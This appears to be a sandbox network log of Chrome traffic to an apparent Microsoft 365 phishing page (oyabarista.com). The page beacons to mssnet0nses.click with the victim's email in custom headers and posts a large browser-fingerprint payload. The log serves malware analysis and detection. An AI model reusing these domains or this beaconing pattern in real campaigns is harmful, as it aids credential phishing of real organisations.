                                                        122192.168.2.549878172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:13 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNri5n&sid=gGEhwn_6LXzjgi5BAAfT HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:13 UTC829INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:13 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=einitStY%2BsPqqLCb8kSAk3ufhJHHThiab6BHmL5eFET6EEZJ2YdgoocbWDpeiMfkXRasW6T2U1w4bZXrEZ%2BET%2BNvyymFxQ3ru25UsLywJuc1Zy4RYYymbpJS7DF1mJUVTxhYqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f4e9f9397d2-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84568&min_rtt=84445&rtt_var=17902&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1022&delivery_rate=36173&cwnd=252&unsent_bytes=0&cid=36095888d86f7cc2&ts=265&x=0"
                                                        2025-03-27 13:42:13 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
                                                        Data Ascii: 29{"code":1,"message":"Session ID unknown"}
                                                        2025-03-27 13:42:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        123192.168.2.549879172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:14 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrikj HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:14 UTC947INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:14 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VST9yrVVpI9rPyfqpz4ki%2BipMTvEdJvdf7LCgmukosopoe1Sgdt%2FjB%2FycTAgMsGjKj54VY3Uqg%2Fks0tf8HppnUJUkKOe02lz0U6q3TvpDqKFn7i%2FvLY%2B73ZUxZWhSebZVqXOYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f546c85862e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84232&min_rtt=84217&rtt_var=17790&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1139&delivery_rate=36270&cwnd=252&unsent_bytes=0&cid=4a7b1ad85f1084c6&ts=271&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        124192.168.2.549880172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:14 UTC667OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrikj HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:15 UTC851INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:15 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GX8eQPfW4IKoWWiFTdB26SKPpj7jwVKrlVRJEoD%2BRpbkTUmoj4AskKb3FuoQVHm05cd7nzakC2kBLN%2FSa%2By19SY7IMRSpGQI1ksZMPaeMG%2Fkdh9FPyH0G14mu249LMlmhrSC%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f573b144368-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83940&min_rtt=83788&rtt_var=17907&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1239&delivery_rate=36268&cwnd=252&unsent_bytes=0&cid=928285d94797519d&ts=313&x=0"
                                                        2025-03-27 13:42:15 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 32 59 69 42 48 48 45 47 68 31 69 48 4f 48 4b 4e 41 41 66 57 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"2YiBHHEGh1iHOHKNAAfW","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        125192.168.2.549881172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:15 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrizO&sid=2YiBHHEGh1iHOHKNAAfW HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:15 UTC375INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:15 GMT
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f5a4da8c8c6-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        126192.168.2.549883172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:15 UTC425OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrikj HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:15 UTC852INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:15 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KARZboWktcqOlBODGsBpvL1cm4UkXB%2FLWVim7Dvkl48hfgbuNr9S%2F%2B%2FOw5zZVKEwKNxZl4VG8yzDpHZ%2B8xUm2nfkDRHYnUBxfeZGJRuvxYa9Q%2FeYe18sTdI3rxnilgndpDZkTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f5a4bbd7d0e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=85387&min_rtt=84927&rtt_var=18380&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=997&delivery_rate=35982&cwnd=252&unsent_bytes=0&cid=a0324ed3437a5eb9&ts=308&x=0"
                                                        2025-03-27 13:42:15 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 54 33 55 5a 6f 46 75 71 4e 79 37 45 34 47 38 76 41 41 66 58 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"T3UZoFuqNy7E4G8vAAfX","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        127192.168.2.549882172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:15 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrizQ&sid=2YiBHHEGh1iHOHKNAAfW HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:15 UTC375INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:15 GMT
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f5a5c5dc329-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        128192.168.2.549884172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:15 UTC566OUTGET /socket.io/?EIO=4&transport=websocket&sid=2YiBHHEGh1iHOHKNAAfW HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://www.oyabarista.com
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: i7MMuKhMTQdx28PFiT3Pxw==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2025-03-27 13:42:15 UTC831INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:15 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RFSzARkXVcwBnEA7SqmMDPMe4xrIii7D7hbduMA%2B2L3T9XVNHRwLhMj2bqtRisQ4saxbEnnygdYdPgoc7gAJlBpCMZ82nouCzWGm5DdFASbP%2F%2BjBg6GmWHj1LCTXnM%2FaF1aeuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f5ad85c43f8-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83822&min_rtt=83767&rtt_var=17720&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1121&delivery_rate=36487&cwnd=252&unsent_bytes=0&cid=02eaa19ac4616951&ts=307&x=0"
                                                        2025-03-27 13:42:15 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}
                                                        2025-03-27 13:42:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        129192.168.2.549886172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:15 UTC752OUTPOST /socket.io/?EIO=4&transport=polling&t=PNNrizO&sid=2YiBHHEGh1iHOHKNAAfW HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Content-Length: 2
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Content-type: text/plain;charset=UTF-8
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:15 UTC2OUTData Raw: 34 30
                                                        Data Ascii: 40
                                                        2025-03-27 13:42:15 UTC840INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:15 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VtAcNvOCBa9ndM79YkG2nyzEXGAZQ%2BdXC%2BvR9nUiB7p44a0eyjyxHqw%2Bcd3kBdpzptn5fJoRuXCd4QTwSEzzMyAehADgDYkAljdxL82HvATqH8%2FMm0uKSTao8unMEDa4Y2foHg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f5d0a358cdd-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83818&min_rtt=83536&rtt_var=17882&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1348&delivery_rate=36565&cwnd=252&unsent_bytes=0&cid=5dc558f13d9a4def&ts=305&x=0"
                                                        2025-03-27 13:42:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2025-03-27 13:42:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        130192.168.2.549887172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:15 UTC692OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrizQ&sid=2YiBHHEGh1iHOHKNAAfW HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:16 UTC849INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:16 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lPl58RfqppZC7rsXFOG6RzLj2bBgQ5R%2FpN9jUbtWKtK0XNPpJ%2BffPeqePzpYr3rtMj71Yie%2B330bPO%2FXPamqMyfVXNI1WIJoUxZhs1qXSdkIgF9YtWFHSLWCtXJ%2BPEKsqpvH7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f5d5dbb4252-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83609&min_rtt=83509&rtt_var=17772&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1264&delivery_rate=36454&cwnd=252&unsent_bytes=0&cid=4dccacb2b49d97b1&ts=705&x=0"
                                                        2025-03-27 13:42:16 UTC1INData Raw: 31
                                                        Data Ascii: 1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        131192.168.2.549888172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:16 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrizO&sid=2YiBHHEGh1iHOHKNAAfW HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:16 UTC250INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:16 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f601d66de6d-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        132192.168.2.549877104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:16 UTC1021OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:16 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:42:16 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
                                                        2025-03-27 13:42:16 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
